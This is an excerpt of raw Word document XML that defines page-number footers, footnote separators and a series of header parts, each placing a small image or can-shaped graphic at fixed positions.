    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="56E18E34" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="00E131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CEC3" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="002E7D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65C1">
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
        <w:noProof/>
      </w:rPr>
      <w:t>80</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="PageNumber"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="4CE39DC5" w14:textId="74781E58" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000F58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0850B" w14:textId="77777777" w:rsidR="008654FC" w:rsidRDefault="008654FC" w:rsidP="004B0A6F">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4FE49485" w14:textId="77777777" w:rsidR="008654FC" w:rsidRDefault="008654FC" w:rsidP="004B0A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6AB7" w14:textId="0966B72A" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251745280" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="448D8114" wp14:editId="0BC52764">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5956935</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-442595</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="622300" cy="646430"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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5EF1" w14:textId="63C27C6C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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9FED" w14:textId="39D779D8" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1A6A37F3" wp14:editId="2989A1F3">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6019165</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332740</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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0AD4" w14:textId="29865E83" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FA97863" wp14:editId="13009A35">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5959475</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332740</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="609600" cy="601345"/>
          <wp:effectExtent l="0" t="0" r="0" b="8255"/>
          <wp:wrapSquare wrapText="bothSides"/>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134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F055" w14:textId="29B8105F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251692032" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1558E4DB" wp14:editId="4A60D859">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6085840</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-334645</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="502285" cy="415290"/>
          <wp:effectExtent l="0" t="0" r="5715" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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9ED" w14:textId="713A8E24" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251685888" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6E6BF702" wp14:editId="17A1C991">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5953760</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332740</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="572770" cy="541020"/>
          <wp:effectExtent l="0" t="0" r="11430" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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6608" w14:textId="1E70131B" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687936" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4C99B3C5" wp14:editId="6DE3CE94">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>9069070</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-337820</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="572770" cy="541020"/>
          <wp:effectExtent l="0" t="0" r="11430" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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A8CC" w14:textId="30B9F42E" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251689984" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="68D96804" wp14:editId="1FBBED4C">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6019800</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-333375</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="513715" cy="513715"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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91D1" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251694080" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="342CBCAB" wp14:editId="740478BA">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6085840</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-334645</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="502285" cy="415290"/>
          <wp:effectExtent l="0" t="0" r="5715" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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734A" w14:textId="04945227" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="49204C47" wp14:editId="69397635">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5962015</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-447675</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="614680" cy="614680"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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1197" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251680768" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1AC99185" wp14:editId="41E04F9E">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5836285</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-335915</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="692785" cy="610870"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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692785" cy="6108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5948" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251743232" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0A00F541" wp14:editId="61CD66C6">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5958840</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-335280</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="622300" cy="646430"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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CE4A" w14:textId="5CDC3987" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251676672" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0797CF35" wp14:editId="396F85F3">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6025515</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-333375</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="506095" cy="446405"/>
          <wp:effectExtent l="0" t="0" r="1905" b="10795"/>
          <wp:wrapSquare wrapText="bothSides"/>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506095" cy="446405"/>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C58F" w14:textId="620458B1" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251683840" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5BCB6660" wp14:editId="403B05E2">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5963285</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-335915</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="565785" cy="559435"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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402F" w14:textId="0F2F2463" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251702272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1E93934A" wp14:editId="07D91914">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5963285</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-335915</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="565785" cy="559435"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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DE7F" w14:textId="11E3439F" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251700224" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4F08207A" wp14:editId="530CB6B0">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5955665</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332740</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="577215" cy="577215"/>
          <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
          <wp:wrapSquare wrapText="bothSides"/>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C219" w14:textId="7AA5403C" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251698176" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="309E4678" wp14:editId="0A962C15">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5960110</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332740</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="573405" cy="573405"/>
          <wp:effectExtent l="0" t="0" r="10795" b="10795"/>
          <wp:wrapSquare wrapText="bothSides"/>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7340" w14:textId="65C79DCA" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251764736" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35FD2EF7" wp14:editId="7B1F6EE9">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>5817234</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>-224112</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="568081" cy="577172"/>
              <wp:effectExtent l="0" t="0" r="16510" b="33020"/>
              <wp:wrapNone/>
              <wp:docPr id="25" name="Can 25"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="568081" cy="577172"/>
                      </a:xfrm>
                      <a:prstGeom prst="can">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A7D02"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5" o:spid="_x0000_s1026" type="#_x0000_t22" style="position:absolute;margin-left:458.05pt;margin-top:-17.6pt;width:44.75pt;height:4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" adj="5315" fillcolor="#e7e6e6 [3214]" strokecolor="#747070 [1614]" strokeweight="1pt">
              <v:stroke joinstyle="miter"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
    <w:r>
      <w:tab/>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08AA" w14:textId="49E0D942" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251762688" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="455AA3B2" wp14:editId="36AF28F2">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6048375</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-87630</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="472440" cy="332740"/>
          <wp:effectExtent l="50800" t="76200" r="35560" b="7366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63712" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="51511600" wp14:editId="011FA951">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-532765</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-448945</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="946785" cy="94678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ilgun.png"/>
                  <pic:cNvPicPr/>
                </pic:nvPicPr>
                <pic:blipFill>
                  <a:blip r:embed="rId2">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44E6" w14:textId="743DCBFF" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251760640" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01C7E4FC" wp14:editId="060C9DDA">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-532765</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-448945</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="723900" cy="682625"/>
          <wp:effectExtent l="0" t="0" r="12700" b="3175"/>
          <wp:wrapSquare wrapText="bothSides"/>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6826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58592" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="35A8CEA2" wp14:editId="5856B182">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5944235</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-334645</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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1F83" w14:textId="77777777" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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A6378" w14:textId="165E8E66" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251729920" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4489A93C" wp14:editId="10C10333">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-405765</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-221615</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="577215" cy="577215"/>
          <wp:effectExtent l="0" t="0" r="6985" b="6985"/>
          <wp:wrapSquare wrapText="bothSides"/>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5824" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7634260A" wp14:editId="59F93984">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6007735</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332105</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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016C" w14:textId="15FA5DF8" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">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9430" w14:textId="2C727972" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251727872" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3EA9D45E" wp14:editId="1EDAC3C6">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-342265</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-221615</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="513715" cy="513715"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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3776" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="34D4B463" wp14:editId="7E292779">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5944235</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-331470</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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ADE3" w14:textId="53FCD185" w:rsidR="002A05E5" w:rsidRDefault="002A05E5" w:rsidP="000D698A">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:tabs>
        <w:tab w:val="clear" w:pos="4536"/>
        <w:tab w:val="clear" w:pos="9072"/>
        <w:tab w:val="left" w:pos="8236"/>
      </w:tabs>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251754496" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="24FECC63" wp14:editId="16E50EF2">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-367030</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-165100</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="472440" cy="332740"/>
          <wp:effectExtent l="50800" t="76200" r="35560" b="73660"/>
          <wp:wrapSquare wrapText="bothSides"/>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0160" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30C49F89" wp14:editId="7D8B2027">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>6007735</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-332105</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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3C31C" w14:textId="298D3E01" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251752448" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2A90739F" wp14:editId="06F85CDE">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-307975</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-164465</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="472440" cy="332740"/>
          <wp:effectExtent l="50800" t="76200" r="35560" b="73660"/>
          <wp:wrapSquare wrapText="bothSides"/>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1968" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61E87309" wp14:editId="31AEC126">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>5944235</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-331470</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="546100" cy="538480"/>
          <wp:effectExtent l="0" t="0" r="12700" b="0"/>
          <wp:wrapSquare wrapText="bothSides"/>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3CE0" w14:textId="34169876" w:rsidR="002A05E5" w:rsidRDefault="002A05E5">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
        <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
      </w:rPr>
      <w:drawing>
        <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251738112" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="61E3A654" wp14:editId="6C783CAF">
          <wp:simplePos x="0" y="0"/>
          <wp:positionH relativeFrom="column">
            <wp:posOffset>-342265</wp:posOffset>
          </wp:positionH>
          <wp:positionV relativeFrom="paragraph">
            <wp:posOffset>-335915</wp:posOffset>
          </wp:positionV>
          <wp:extent cx="614680" cy="614680"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
